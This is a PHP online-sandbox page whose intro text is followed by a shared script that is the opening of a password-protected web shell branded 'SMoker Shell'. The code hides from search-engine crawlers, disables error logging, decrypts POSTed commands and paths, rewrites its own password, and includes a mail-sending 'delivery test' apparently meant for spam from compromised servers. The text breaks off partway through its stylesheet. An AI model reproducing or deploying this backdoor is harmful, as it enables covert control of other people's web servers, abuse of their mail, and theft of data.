PHP (Hypertext PreProcessor) - PHP is a server side scripting language designed primarily for web development. PHP code may be embedded into HTML, or it can be used in combination with various web template systems ,web content management systems and web frameworks.

What is PHP Online Sandbox?

The Online PHP Sandbox was created to help with debugging, testing and running your php code online. Also it allows developers to share their PHP code with the community. This tool works with a whitelist of functions. All functions that do require disk, system or network access are blacklisted, others whitelisted. Max execution time is set to 3 seconds. If you find a disabled function that should be whitelisted or if you run into other problems, please contact us. For echo output line break in the CLI mode, need to use PHP_EOL or \n Test your PHP code online without the need of a web server.

Can I run PHP program online?

Using our tool you can edit PHP code, and view the result in your browser. Just paste your PHP code to the textarea above and click to the button "Execute" and you will get result of executing PHP Online .

How to validate PHP syntax online?

With our tool you can paste your code into the PHP editor and it will immediately show syntax errors if any. Also, you can try to run your code online to find more hidden problems and bugs.

Why do you need to run PHP script online?

Very often, developers need to test some small logic, and it's faster to test it in our PHP compiler than to create a separate script and test it on their local server or on a remote server.

457.php PHP Script

<?php

error_reporting(0);

//--------------Real SMo--------------//

if(array_key_exists('watching',$_POST)){

$tmp = $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\n".$_REQUEST['pass'];

}

function get_passo(){

$pattern = '/\$shellpassword=\"(.*?)\";/';

$subject = file_get_contents($_SERVER['SCRIPT_FILENAME']);

$result = preg_match($pattern, $subject, $matches);

return isset($matches[1]) ? $matches[1] : "";

}

function changepass($plain){

$newpass = "\$shellpassword=\"".$plain."\";";

$con = file_get_contents($_SERVER['SCRIPT_FILENAME']);

$con = preg_replace("/\\\$shellpassword\ *=\ *[\"\']*[a-zA-Z0-9_!@#%^&*=+()-]*[\"\']*;/is",$newpass,$con);

if(file_put_contents($_SERVER['SCRIPT_FILENAME'], $con)){

return true;

}else{return false;}

}

$shellpassword="SMok8108";

$password_shell = $shellpassword != "" ? md5($shellpassword) : "";

$wad = true;

$dec = 'UTF-8';

$dect = 'FilesMan';

$dea = md5($_SERVER['HTTP_USER_AGENT']);

if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])) {

prototype(md5($_SERVER['HTTP_HOST'])."key", $dea);

}//--------------Real SMo--------------//

if(empty($_POST['charset']))

$_POST['charset'] = $dec;

if (!isset($_POST['ne'])) {

if(isset($_POST['a'])) $_POST['a'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['a'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));

if(isset($_POST['c'])) $_POST['c'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['c'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));

if(isset($_POST['p1'])) $_POST['p1'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p1'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));

if(isset($_POST['p2'])) $_POST['p2'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p2'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));

if(isset($_POST['p3'])) $_POST['p3'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p3'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));

}//--------------Real SMo--------------//

function decrypt($str,$pwd){

$pwd=base64_encode($pwd);$str=base64_decode($str);$enc_chr="";$enc_str="";$i=0;while($i<strlen($str)){

for($j=0;$j<strlen($pwd);$j++){$enc_chr=chr(ord($str[$i])^ord($pwd[$j]));$enc_str.=$enc_chr;$i++;if($i>=strlen($str))break;}}return base64_decode($enc_str);}

@ini_set('error_log',NULL);

@ini_set('log_errors',0);

@ini_set('max_execution_time',0);

@set_time_limit(0);

if (PHP_VERSION_ID < 70000)

@set_magic_quotes_runtime(0);

@define('VERSION', '4.2.5');

if(get_magic_quotes_gpc()) {

function stripslashes_array($array) {

return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);

}

$_POST = stripslashes_array($_POST);

$_COOKIE = stripslashes_array($_COOKIE);

}

if(!empty($password_shell)) {

if(isset($_REQUEST['pass']) && (md5($_REQUEST['pass']) == $password_shell))

prototype(md5($_SERVER['HTTP_HOST']), $password_shell);

if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) && ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $password_shell))

hardLogin();

}

if(!empty($password_shell) && isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) && ($_COOKIE[md5($_SERVER['HTTP_HOST'])] == $password_shell) || empty($password_shell)){

if(isset($_REQUEST['changepass']) && isset($_REQUEST['renamos'])){

die(changer($_REQUEST['changepass'],$_REQUEST['renamos']));

}

if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax']))

$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$wad;

function hardLogin() {

if(isset($_REQUEST['pass']) && (md5($_REQUEST['pass']) != $password_shell)){

$al = '<div class="alert alert-danger alert-dismissible fade show" role="alert" style="background: rgba(234, 84, 85, 0.2) !important;

color: #EA5455 !important;border-color: rgb(0 0 0 / 8%);border-radius: 10px;">

<span>Incorrect password!</span>

</div>';

}

if(!empty($_SERVER['HTTP_USER_AGENT'])) {

$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");

if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {

header('HTTP/1.0 404 Not Found');

exit;

}

die('<html lang="en"><head>

<title>' . $_SERVER['HTTP_HOST'] . ' - enter shell password</title>

<style>

.auth-wrapper {

display: -webkit-box;

display: -webkit-flex;

display: -ms-flexbox;

display: flex;

-webkit-flex-basis: 100%;

-ms-flex-preferred-size: 100%;

flex-basis: 100%;

min-height: 100vh;

min-height: calc(var(--vh, 1vh) * 100);

width: 100%

}

.auth-wrapper .auth-inner {

width: 100%;

position: relative

}

.auth-wrapper.auth-v1 {

-webkit-box-align: center;

-webkit-align-items: center;

-ms-flex-align: center;

align-items: center;

-webkit-box-pack: center;

-webkit-justify-content: center;

-ms-flex-pack: center;

justify-content: center;

overflow: hidden

}

.auth-wrapper.auth-v1 .auth-inner:before {

width: 244px;

height: 243px;

content:" ";

position: absolute;

top: -54px;

left: -46px;

background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAPQAAADzCAMAAACG9Mt0AAAAAXNSR0IArs4c6QAAAERlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAA6ABAAMAAAABAAEAAKACAAQAAAABAAAA9KADAAQAAAABAAAA8wAAAADhQHfUAAAAyVBMVEUAAAD///+AgP+AgP9mZv+AgNWAgP9tbf9gYP+AgP9xcf9mZv+AZuaAgP9dXf90dOhiYv92dv9mZu5mZv93d+53d/9paf94afCAcfFrXvJra/9mZvJzZvJzc/JoaP96b/Rqav91aupsYvV2bOt2bPVxaPZ7cfZqavZyau1waPd4aO9xafBxafh4afB1bfh4avFuZ/F2afJzZvJzZ/N0aPN0bvN3bPR0ae5yZ/R3be93bfR1au9zafBxbPVzavV0a/F0a/ZyafFwaPKZm3nTAAAAQ3RSTlMAAQIEBQYGBwgICQoKCgsLDQ0PDw8PERESExMUFBQWFxgYGhoaGxsdHSAgIiIiIyQlJygqLCwtLi8vLzAzNDU3Nzg7h9vbHgAAA9RJREFUeNrt3ftS2kAUx/Fc1gSyWsErtuJdRDQiiteolb7/QzUoTm07k4AzObuu3/MCez45yWbzT36eZ6b8erO1e1B97baadd+zocJWmg0HaXe/+uqmg2GWtkLT5Lle1m9LdhG2+1lvzuiUO1knEF81yFc1N+35m15kZOGodz1vyLx+v2Lseq/erxtZd/NuweCTtfiwaWLOD5FnsqI7+VnP3y8afnEs3Es/1+H1qvETwuq18B7e6VlwLup1ZM8kWWQBOsrmHL7GVtxvYRZYgQ4ywae61ffsqH5Lbq20bQm6ncp9P2ehJegwE/u+rl95ttSwLrVSc2ANetAU28dSa9Cp2E623bUG3d2VWmn/wBq0XCugQYMGLdVKoOJaoiuok1NdXSW1WAUfRPtRUllflaJf5ZE/O9pXVbZUPTov5c+IDqvtRwStdTgLutoxy6GnGfYb2o+1I2gd+1OiqzfLocvVE7TSDqG1mgodaqfQZbvZC9rXjqG1X45WzqFVKVpk0LLo4lGP0ZGD6KgMnTiITkrQgXYQrYNitHISrYrRsZPouBhdcxJdK0YnTqKTYrR2Eq1BgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRoh9DH59ag86ACoSYOL61B55EUQk1s3VqDzsNHhJpYe7QGncfMSHUxaliCHgcKSXVxeWQJehwdJdXF4dAS9DgkTKqLxuibFeiXODixNi7OrEC/BP+JtbE0WrYA/RrxKNfH2YUF6NegSbk+Gk87xtErN6EsWm88fzeMXpwE9EruLns/l42io4dJFLPo2/Po1w+D6IW7t9Bt2SPx3vOOMfS7eHVZtN54ulg2go56138Ct4XRunE2Ovsmjg46WeddUoUWr6WL0fCoIYgO2/2s91fstDZQjcPL0ePt5flpdXUwqW46uMrS1j95JNpQrW0dHp9UV/uT2m416/8HVGg3qzhpBjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KC/FDpx0pwUo2tOomvF6NhJdFyMVk6iVTE6cBIdeF9vJyvZx/I/AzuIjsrQvoNovwzt4FamSs0Ojrp80PmvoB0zh940pb7azf1yg7t0LIt978uppzbnalfucDW92ZndLPRmKweGPduYJ+zoM5/Dk+gD5NdvLhXXPp88qcUqmEH5G5JZRs6cuxwIAAAAAElFTkSuQmCC)

}

.auth-wrapper.auth-v1 .auth-inner:after {

width: 272px;

height: 272px;

content:" ";

position: absolute;

bottom: -55px;

right: -75px;

background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAARAAAAEQCAMAAABP1NsnAAAAAXNSR0IArs4c6QAAAERlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAA6ABAAMAAAABAAEAAKACAAQAAAABAAABEKADAAQAAAABAAABEAAAAAAQWxS2AAAAwFBMVEUAAAD///+AgICAgP9VVaqqVf+qqv+AgL+AgP9mZsxmZv+ZZv+AgNWAgP9tbdttbf+Sbf+AYN+AgN+AgP9xceNmZv+AZuaAZv90dOh0dP9qav+AauqAav+AgP92dv9tbf+Abe2Abf93Zu53d+6AcO94afCAcfF5a+R5a/JzZuaAZvKAc/J5bed5bfOAaPN6b/R1auqAavR6ZvV6cPV2bOuAbPV7aPZ2be2AbfZ7au17avZ3Zu53b+57a+97a/d4aO9J6CoeAAAAQHRSTlMAAQICAwMDBAQFBQUGBgcHBwgICAkKCgoLCwwMDAwNDg4ODw8QERITExQUFBUVFhcYGBkZGhobHBwdHR4eHx8gJ5uMWwAAA/FJREFUeNrt2G1XEkEYxvHZNk2xHGzdbKFl0cTwgdSkCKzu7/+t4pw6sAjtjIueE/f8r3fMO35nZnbuy5gVGcvfzJe0rnTfGI+MggGJRUZnbpPIhJKt88nU53JnFULvyISY6KAv8vPj0vr2rYwiE2Z2B9J+uNYcyyQxwWZvaeGH3G4bMjsvI/kcwTC/V+7kLoahlITzQojP3ZFgsJCh7IJQzpX0QFj4uMiY18eDMZ9bZCF9OQahnK6cm/Y7js0sh/LF3Auv1PlQd3MxbdXYIQspV44EEEAAAWTNDAYYkKdJbNMsLzYueZbaZ2iM46RVbHBaiZ9Js+nHEdli42N9XuSen5hGp1CQTuOJQDRsD99N4gMSpYWapNH6IJo83CIeILZQFesEaber79NCWRoukOpNEnW0gXQqD81w6ACxhbrYde7VuFCYeA2QRCNIsgZISyNIqz6IyhPjOjNVIFYniK3dmKU6QdLaJUimEySrDZLrBMlrgxRKU7sxCw/EMe0CAggggADySJCqxixIkKpNEh6IozELD8RxjQACCCCAAPJIkKrGLEgQXqqAAEJjxrQLCCCAAEJjRmNGY8a0CwgggABCYwYIfQgggNCYMe0CAggggNCY0ZjRmDHtAgIIIIAAQmNGHwIIIDRmTLuAAAIIIDRmNGY0Zky7gAACCCCA0JjRhwACCI0Z0y4ggAACCI0ZjRmNGdMuIIAAAgggNGb0IYAAQmPGtAsIIIAAQmNGY0ZjxrQLCCCAAAIIjRl9CCCA0Jgx7QICCCCA0JjRmNGYMe0CAggggABCY0YfAgggNGZMu4AAAgggNGY0ZjRmTLuAAAIIIIDQmNGHAAIIjRnTLiCAAAIIjRmNGY0ZIEy7gAACCCA0ZvQhgABCY8a0CwgggABCY0ZjBgiNGdMuIIAAAgiN2f/Sh+Q6PfLaIJlOkKw2SKoTJK3dmFmdILb2tBvrBIlrg5iWRo+WqQ+SaARJ1gCJAzsxThCN16p1vNurGjNjoo42j07kAHFskoY2kEbl33U0ZgoPjXW+Rl0gkarnahqtDaJKxMPDDWIiNafGenh4gExvVhXfmk7Da6L1AVGxSby2h6MxK79Zk42ea1pJbJ48sU2zDezQ8iy1z6BBwoyjMQsvXp8YQAAhgADilRfyy+wf8WqZZUfGZihvgZiB3FybC+kCUU5XLkAo50C+gbBQdUzkAIVyejIAYfFTI1solHP2HgNCnHn5AYNy4jvpoVB6fVzL91cwzLJ9Lfd7S0jhehxO5H5/yePr1W6gHonI7fJ5ORSR/n6Q2yQanq763zuXU5LJZRKiyD/W9/pjkdPZz0/yJ8fqVyry+qQZDMjJKoDfy8bRVhHhQTwAAAAASUVORK5CYII=);

z-index: -1

}

@media (max-width:575.98px) {

.auth-wrapper.auth-v1 .auth-inner:after,

.auth-wrapper.auth-v1 .auth-inner:before {

display: none

}

.auth-wrapper.auth-v1 .auth-inner {

max-width: 400px

}

.auth-wrapper .brand-logo {

display: -webkit-box;

display: -webkit-flex;

display: -ms-flexbox;

display: flex;

-webkit-box-pack: center;

-webkit-justify-content: center;

-ms-flex-pack: center;

justify-content: center;

margin: 1rem 0 2rem

}

.auth-wrapper .brand-logo .brand-text {

font-weight: 600

}

@media (min-width:1200px) {

.auth-wrapper.auth-v2 .auth-card {

width: 400px

}

</style>

</head>

<body style="

color: #B4B7BD;

background-color: #161D31;

">

<div class="card mb-0" style="

background-color: #283046;

box-shadow: 0 4px 24px 0 rgb(34 41 47 / 24%);

border-radius: 15px;

">

<a href="https://t.me/RealSMo" target="_blank" style="

color: #7367F0 !important;

background-color: transparent;

" class="brand-logo">

<h2 class="brand-text text-primary ml-1" style="

color: #7367F0 !important;

background-color: transparent;

">SMok SHOP</h2>

</a>

'.$al.'

<h4 class="card-title mb-1">Shell-Password</h4>

<p class="card-text mb-2">This shell is protected by password please enter it</p>

<label class="form-label">Password</label>

<input required="" type="password" class="form-control" name="pass" placeholder="Password" autofocus="" style="

border-color: #404656;

background-color: #283046;

color: #B4B7BD;

">

</div>

<input value="submit" type="submit" name="watching" class="btn btn-primary btn-block waves-effect waves-float waves-light" style="

color: #FFF;

background-color: #7367F0;

border-color: #7367F0;

">

</form>

</div>

</body></html>');

}

if(isset($_REQUEST['email'])){

$actual_linka = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];

$partsa = parse_url($actual_linka);

$stra = $partsa['scheme'].'://'.$partsa['host'].$partsa['path'];

$emall = isset($_REQUEST['email'])?$_REQUEST['email']:null;

$aler = '';

function hideEmailAddress($email)

{

$em = explode("@",$email);

$name = implode(array_slice($em, 0, count($em)-1), '@');

$len = floor(strlen($name)/2);

return substr($name,0, $len) . str_repeat('*', $len) . "@" . end($em);

}

if (filter_var($emall, FILTER_VALIDATE_EMAIL)){

$recipient = isset ($emall) ? $emall : null;

$subject = isset ($_REQUEST["subject"]) ? $_REQUEST["subject"] : "Delivery Test from shell [$stra]";

$message = isset ($_REQUEST["msg"]) ? $_REQUEST["msg"] : "If you see this msg this means that Shell [$stra] Delivery is working good";

if(mail($recipient, $subject, $message))

{

$aler = '<div class="alert alert-success alert-dismissible fade show" role="alert" style="background: rgba(40, 199, 111, 0.2) !important;color: #28C76F !important;border-color: rgb(0 0 0 / 8%);border-radius: 10px;">

<span>Test email sent to '.hideEmailAddress($emall).' Successfully</span>

</div>';

}

else{

$aler = '<div class="alert alert-danger alert-dismissible fade show" role="alert" style="background: rgba(234, 84, 85, 0.2) !important;

color: #EA5455 !important;border-color: rgb(0 0 0 / 8%);border-radius: 10px;">

<span>Test email Failed to '.hideEmailAddress($emall).'</span>

</div>';

}

echo '<html lang="en"><head>

<title>' . $_SERVER['HTTP_HOST'] . ' - Shell delivery test</title>

<style>

.auth-wrapper {

display: -webkit-box;

display: -webkit-flex;

display: -ms-flexbox;

display: flex;

-webkit-flex-basis: 100%;

-ms-flex-preferred-size: 100%;

flex-basis: 100%;

min-height: 100vh;

min-height: calc(var(--vh, 1vh) * 100);

width: 100%

}

.auth-wrapper .auth-inner {

width: 100%;

position: relative

}

.auth-wrapper.auth-v1 {

-webkit-box-align: center;

-webkit-align-items: center;

-ms-flex-align: center;

align-items: center;

-webkit-box-pack: center;

-webkit-justify-content: center;

-ms-flex-pack: center;

justify-content: center;

overflow: hidden

}

.auth-wrapper.auth-v1 .auth-inner:before {

width: 244px;

height: 243px;

content:" ";

position: absolute;

top: -54px;

left: -46px;

background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAPQAAADzCAMAAACG9Mt0AAAAAXNSR0IArs4c6QAAAERlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAA6ABAAMAAAABAAEAAKACAAQAAAABAAAA9KADAAQAAAABAAAA8wAAAADhQHfUAAAAyVBMVEUAAAD///+AgP+AgP9mZv+AgNWAgP9tbf9gYP+AgP9xcf9mZv+AZuaAgP9dXf90dOhiYv92dv9mZu5mZv93d+53d/9paf94afCAcfFrXvJra/9mZvJzZvJzc/JoaP96b/Rqav91aupsYvV2bOt2bPVxaPZ7cfZqavZyau1waPd4aO9xafBxafh4afB1bfh4avFuZ/F2afJzZvJzZ/N0aPN0bvN3bPR0ae5yZ/R3be93bfR1au9zafBxbPVzavV0a/F0a/ZyafFwaPKZm3nTAAAAQ3RSTlMAAQIEBQYGBwgICQoKCgsLDQ0PDw8PERESExMUFBQWFxgYGhoaGxsdHSAgIiIiIyQlJygqLCwtLi8vLzAzNDU3Nzg7h9vbHgAAA9RJREFUeNrt3ftS2kAUx/Fc1gSyWsErtuJdRDQiiteolb7/QzUoTm07k4AzObuu3/MCez45yWbzT36eZ6b8erO1e1B97baadd+zocJWmg0HaXe/+uqmg2GWtkLT5Lle1m9LdhG2+1lvzuiUO1knEF81yFc1N+35m15kZOGodz1vyLx+v2Lseq/erxtZd/NuweCTtfiwaWLOD5FnsqI7+VnP3y8afnEs3Es/1+H1qvETwuq18B7e6VlwLup1ZM8kWWQBOsrmHL7GVtxvYRZYgQ4ywae61ffsqH5Lbq20bQm6ncp9P2ehJegwE/u+rl95ttSwLrVSc2ANetAU28dSa9Cp2E623bUG3d2VWmn/wBq0XCugQYMGLdVKoOJaoiuok1NdXSW1WAUfRPtRUllflaJf5ZE/O9pXVbZUPTov5c+IDqvtRwStdTgLutoxy6GnGfYb2o+1I2gd+1OiqzfLocvVE7TSDqG1mgodaqfQZbvZC9rXjqG1X45WzqFVKVpk0LLo4lGP0ZGD6KgMnTiITkrQgXYQrYNitHISrYrRsZPouBhdcxJdK0YnTqKTYrR2Eq1BgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRoh9DH59ag86ACoSYOL61B55EUQk1s3VqDzsNHhJpYe7QGncfMSHUxaliCHgcKSXVxeWQJehwdJdXF4dAS9DgkTKqLxuibFeiXODixNi7OrEC/BP+JtbE0WrYA/RrxKNfH2YUF6NegSbk+Gk87xtErN6EsWm88fzeMXpwE9EruLns/l42io4dJFLPo2/Po1w+D6IW7t9Bt2SPx3vOOMfS7eHVZtN54ulg2go56138Ct4XRunE2Ovsmjg46WeddUoUWr6WL0fCoIYgO2/2s91fstDZQjcPL0ePt5flpdXUwqW46uMrS1j95JNpQrW0dHp9UV/uT2m416/8HVGg3qzhpBjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KBBgwYNGjRo0KC/FDpx0pwUo2tOomvF6NhJdFyMVk6iVTE6cBIdeF9vJyvZx/I/AzuIjsrQvoNovwzt4FamSs0Ojrp80PmvoB0zh940pb7azf1yg7t0LIt978uppzbnalfucDW92ZndLPRmKweGPduYJ+zoM5/Dk+gD5NdvLhXXPp88qcUqmEH5G5JZRs6cuxwIAAAAAElFTkSuQmCC)

}

.auth-wrapper.auth-v1 .auth-inner:after {

width: 272px;

height: 272px;

content:" ";

position: absolute;

bottom: -55px;

right: -75px;

background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAARAAAAEQCAMAAABP1NsnAAAAAXNSR0IArs4c6QAAAERlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAA6ABAAMAAAABAAEAAKACAAQAAAABAAABEKADAAQAAAABAAABEAAAAAAQWxS2AAAAwFBMVEUAAAD///+AgICAgP9VVaqqVf+qqv+AgL+AgP9mZsxmZv+ZZv+AgNWAgP9tbdttbf+Sbf+AYN+AgN+AgP9xceNmZv+AZuaAZv90dOh0dP9qav+AauqAav+AgP92dv9tbf+Abe2Abf93Zu53d+6AcO94afCAcfF5a+R5a/JzZuaAZvKAc/J5bed5bfOAaPN6b/R1auqAavR6ZvV6cPV2bOuAbPV7aPZ2be2AbfZ7au17avZ3Zu53b+57a+97a/d4aO9J6CoeAAAAQHRSTlMAAQICAwMDBAQFBQUGBgcHBwgICAkKCgoLCwwMDAwNDg4ODw8QERITExQUFBUVFhcYGBkZGhobHBwdHR4eHx8gJ5uMWwAAA/FJREFUeNrt2G1XEkEYxvHZNk2xHGzdbKFl0cTwgdSkCKzu7/+t4pw6sAjtjIueE/f8r3fMO35nZnbuy5gVGcvfzJe0rnTfGI+MggGJRUZnbpPIhJKt88nU53JnFULvyISY6KAv8vPj0vr2rYwiE2Z2B9J+uNYcyyQxwWZvaeGH3G4bMjsvI/kcwTC/V+7kLoahlITzQojP3ZFgsJCh7IJQzpX0QFj4uMiY18eDMZ9bZCF9OQahnK6cm/Y7js0sh/LF3Auv1PlQd3MxbdXYIQspV44EEEAAAWTNDAYYkKdJbNMsLzYueZbaZ2iM46RVbHBaiZ9Js+nHEdli42N9XuSen5hGp1CQTuOJQDRsD99N4gMSpYWapNH6IJo83CIeILZQFesEaber79NCWRoukOpNEnW0gXQqD81w6ACxhbrYde7VuFCYeA2QRCNIsgZISyNIqz6IyhPjOjNVIFYniK3dmKU6QdLaJUimEySrDZLrBMlrgxRKU7sxCw/EMe0CAggggADySJCqxixIkKpNEh6IozELD8RxjQACCCCAAPJIkKrGLEgQXqqAAEJjxrQLCCCAAEJjRmNGY8a0CwgggABCYwYIfQgggNCYMe0CAggggNCY0ZjRmDHtAgIIIIAAQmNGHwIIIDRmTLuAAAIIIDRmNGY0Zky7gAACCCCA0JjRhwACCI0Z0y4ggAACCI0ZjRmNGdMuIIAAAgggNGb0IYAAQmPGtAsIIIAAQmNGY0ZjxrQLCCCAAAIIjRl9CCCA0Jgx7QICCCCA0JjRmNGYMe0CAggggABCY0YfAgggNGZMu4AAAgggNGY0ZjRmTLuAAAIIIIDQmNGHAAIIjRnTLiCAAAIIjRmNGY0ZIEy7gAACCCA0ZvQhgABCY8a0CwgggABCY0ZjBgiNGdMuIIAAAgiN2f/Sh+Q6PfLaIJlOkKw2SKoTJK3dmFmdILb2tBvrBIlrg5iWRo+WqQ+SaARJ1gCJAzsxThCN16p1vNurGjNjoo42j07kAHFskoY2kEbl33U0ZgoPjXW+Rl0gkarnahqtDaJKxMPDDWIiNafGenh4gExvVhXfmk7Da6L1AVGxSby2h6MxK79Zk42ea1pJbJ48sU2zDezQ8iy1z6BBwoyjMQsvXp8YQAAhgADilRfyy+wf8WqZZUfGZihvgZiB3FybC+kCUU5XLkAo50C+gbBQdUzkAIVyejIAYfFTI1solHP2HgNCnHn5AYNy4jvpoVB6fVzL91cwzLJ9Lfd7S0jhehxO5H5/yePr1W6gHonI7fJ5ORSR/n6Q2yQanq763zuXU5LJZRKiyD/W9/pjkdPZz0/yJ8fqVyry+qQZDMjJKoDfy8bRVhHhQTwAAAAASUVORK5CYII=);

z-index: -1

}

@media (max-width:575.98px) {

.auth-wrapper.auth-v1 .auth-inner:after,

.auth-wrapper.auth-v1 .auth-inner:before {

display: none

}

.auth-wrapper.auth-v1 .auth-inner {

max-width: 500px;

}

.auth-wrapper .brand-logo {

display: -webkit-box;

display: -webkit-flex;

display: -ms-flexbox;

display: flex;

-webkit-box-pack: center;

-webkit-justify-content: center;

-ms-flex-pack: center;

justify-content: center;

margin: 1rem 0 2rem

}

.auth-wrapper .brand-logo .brand-text {

font-weight: 600

}

@media (min-width:1200px) {

.auth-wrapper.auth-v2 .auth-card {

width: 400px

}

</style>

</head>

<body style="

color: #B4B7BD;

background-color: #161D31;

">

<div class="card mb-0" style="

background-color: #283046;

box-shadow: 0 4px 24px 0 rgb(34 41 47 / 24%);

border-radius: 15px;

">

<a href="https://t.me/RealSMo" target="_blank" style="

color: #7367F0 !important;

background-color: transparent;

" class="brand-logo">

<h2 class="brand-text text-primary ml-1" style="

color: #7367F0 !important;

background-color: transparent;

">SMok-SHOP</h2>

</a>

'.$aler.'

<h4 class="card-title mb-1">Delivery Test</h4>

<p class="card-text mb-2">Tip: you can fast check delivery with this link directly <br><a href="'.$stra.'[email protected]">'. $stra.'[email protected]</a></p>

<label class="form-label">Email</label>

<input required="" type="email" class="form-control" name="email" placeholder="[email protected]" autofocus="" style="

border-color: #404656;

background-color: #283046;

color: #B4B7BD;

">

<p class="card-text mb-2">Test email will be sent to this email address.</p>

</div>

</div>

</form>

</div>

</body></html>';

exit;

}

if(strtolower(substr(PHP_OS,0,3)) == "win")

$os = 'win';

else

$os = 'nix';

$safe_mode = @ini_get('safe_mode');

if(!$safe_mode)

error_reporting(0);

$disable_functions = @ini_get('disable_functions');

$home_cwd = @getcwd();

if(isset($_POST['c']))

@chdir($_POST['c']);

$cwd = @getcwd();

if($os == 'win') {

$home_cwd = str_replace("\\", "/", $home_cwd);

$cwd = str_replace("\\", "/", $cwd);

}//--------------Real SMo--------------//

if($cwd[strlen($cwd)-1] != '/')

$cwd .= '/';

//--------------Real SMo--------------//

function hardHeader() {

if(empty($_POST['charset']))

$_POST['charset'] = $GLOBALS[$dec];

echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - SMoker Shell</title><link rel='shortcut icon' href='https://i.imgur.com/BSwJ0QE.png'>

<style>

body {background-color:black; color:#7367F0; margin:0; font:normal 75% Arial, Helvetica, sans-serif; }

body,td,th {font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;}

table.info {color:white;}

table#toolsTbl {background-color: black;}

span,h1,a {color:#7367F0 !important;}

span {font-weight:bolder;}

h1 {border-left:5px solid #2E6E9C;color:white !important;padding:2px 5px;font:14pt Verdana;background-color:black;margin:0px;}

div.content {padding:5px;margin-left:5px;background-color:#060a10;}

a {text-decoration:none;}

a:hover {text-decoration:underline;}

.tooltip::after {background:#0663D5;color:white;content: attr(data-tooltip);margin-top:-50px;display:block;padding:6px 10px;position:absolute;visibility:hidden;}

.tooltip:hover::after {opacity:1;visibility:visible;}

.ml1 {border:1px solid; font-family: monospace;#202832;color:#00CFE8!important;padding:5px;margin:0;overflow:auto;}

.bigarea {min-width:100%;max-width:100%;height:400px;}

input, textarea, select {

margin: 0;

color: #fff;

background-color: #555;

border: 1px solid #7367F0;

font: 9pt Monospace,'Courier New';}

label {position:relative}

label:after {font:10px 'Consolas', monospace;-webkit-transform:rotate(90deg);-moz-transform:rotate(90deg);-ms-transform:rotate(90deg);transform:rotate(90deg);right:3px; top:3px;padding:0;position:absolute;pointer-events:none;}

form {margin:0px;}

#toolsTbl {text-align:center;}

#fak {background:none;}

#fak td {padding:5px 0 0 0;}

iframe {border:1px solid #060a10;}

.toolsInp {width:300px}

.main th {text-align:left;background-color:#060a10;}

.main tr:hover{ background-color: #262C30;}

.main td, th{vertical-align:middle;}

input[type='submit']{color: #FFFFFF;display: inline-block;

padding: 0.35em 0.4em;

font-size: 80%;

font-weight: 700;

line-height: 1;

text-align: center;

white-space: nowrap;

vertical-align: baseline;

border-radius: 0.25rem;

-webkit-transition: color 0.15s ease-in-out, background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;

transition: color 0.15s ease-in-out, background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;padding-right: 0.6em;padding-left: 0.6em;border-radius: 10rem;font-weight: 400;box-shadow: 0 0 10px #7367f0;background-color: #7367F0;cursor:pointer;}

input[type='button']{color: #FFFFFF;display: inline-block;

padding: 0.35em 0.4em;

font-size: 80%;

font-weight: 700;

line-height: 1;

text-align: center;

white-space: nowrap;

vertical-align: baseline;

border-radius: 0.25rem;

-webkit-transition: color 0.15s ease-in-out, background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;

